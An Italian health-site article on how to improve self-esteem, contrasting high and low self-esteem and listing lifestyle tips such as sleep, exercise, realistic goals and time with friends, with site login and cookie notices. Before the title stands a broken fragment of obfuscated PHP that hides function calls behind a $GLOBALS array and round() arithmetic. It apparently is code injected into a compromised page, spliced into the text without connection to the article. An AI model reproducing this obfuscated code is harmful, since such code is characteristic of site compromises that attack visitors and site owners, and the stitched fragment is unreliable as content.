=round(0+3))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][60]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.5+0.5)];if($GLOBALS['_1188104000_'][73]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.2+0.2+0.2+0.2+0.2)];if($GLOBALS['_1188104000_'][89]($_59)=round(0+0.6+0.6+0.6+0.6+0.6))$_59=$_64[round(0+0.333333333333+0.333333333333+0.333333333333)];if($GLOBALS['_1188104000_'][106]($_59) Come migliorare l'autostima

Area Riservata



Ti ricordiamo che per rendere attivo il tuo account dopo la registrazione, sarà necessario aprire il messaggio email che riceverai e cliccare sul link di attivazione.
Come migliorare l'autostima PDF 

ultima revisione ottobre 2013 - Mentesana

 

Una persona con un alto livello di autostima:

  • vede il mondo in maniera positiva, pieno di amici, di opportunità e di cose piacevoli;
  • esprime facilmente agli altri i propri sentimenti e le proprie esigenze;
  • valuta le proprie scelte e i propri comportamenti come efficaci;
  • è circondata di persone che rispondono positivamente al suo modo di fare.

Una persona con un basso livello di autostima:

  • vede il mondo in maniera negativa, pieno di persone che la trascurano e che sono sempre pronte ad approfittarne; 
  • vede ogni cosa come problematica e difficile da affrontare;
  • si sente depressa e senza speranze;
  • si sente una vittima;
  • tratta gli altri o come “nemici”, o come “salvatori”;
  • è circondata di persone che, prima o poi, risponderanno negativamente al suo modo di fare.

 

Quelli descritti sopra sono i due estremi di uno spettro di condizioni. Normalmente una persona si sposta da una parte all’altra dello spettro in base agli eventi che accadono nella sua vita. Eventi fortemente stressanti quali, ad esempio, perdere il lavoro, divorziare, scoprire di avere un’importante malattia o trovarsi la casa svaligiata dai ladri, possono infliggere duri colpi all’autostima di una persona; così come, del resto, una promozione al lavoro, superare con successo un esame, innamorarsi o vincere un premio, generalmente accrescono l’autostima.

Se una persona ha di base un’immagine positiva di sé, tende a riassorbire facilmente i colpi all’autostima determinati dagli eventi negativi. Di contro, se una persona non ha quest’immagine positiva, difficilmente avrà livelli elevati di autostima; in un certo senso è come se fosse in una condizione perenne di “bassa autostima”.

 

Consigli per migliorare l’autostima

 

  • Cerca, innanzitutto, di condurre una vita salutare, cioè: nutriti in modo sano ed equilibrato; fai attività fisica regolarmente (per esempio, fai passeggiate a passo svelto per un ora tutti i giorni, oppure fai esercizi moderati per 15-20 minuti al giorno, oppure 60 minuti di ginnastica vigorosa tre volte a settimana); dormi per un numero adeguato di ore.
  • Settimanalmente, dedica una parte del tuo tempo ad attività piacevoli e rilassanti.
  • Impara a capire quali segnali (per esempio, tensione muscolare, cefalea, bruciore o acidità di stomaco, capogiri, ecc.) invia il tuo corpo, quando ti trovi in una situazione stressante. Quando ti capita di percepirli, intervieni subito sulle cause che ti creano stress, piuttosto che attendere e rinviare la soluzione nel tempo.
  • Evita, per quanto possibile, le situazioni sulle quali non puoi attuare nessuna forma di controllo, perché col tempo finiscono per minare l’autostima.
  • Poniti obiettivi realistici, cioè che senti di poter facilmente raggiungere, e impara ad apprezzarli una volta raggiunti, anche se ti possono sembrare insignificanti.
  • Di tanto in tanto, dedicati ad attività nuove, manuali od intellettuali che siano, purché interessanti.
  • Esci regolarmente con gli amici.
 

Per migliorare la tua navigazione su questo sito, utilizziamo cookies ed altre tecnologie che ci permettono di riconoscerti. Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy Utilizzando questo sito, acconsenti agli utilizzi di cookies e delle altre tecnologie descritti nella nostra Cookies Policy.

Acconsento all'utilizzo dei cookies su questo sito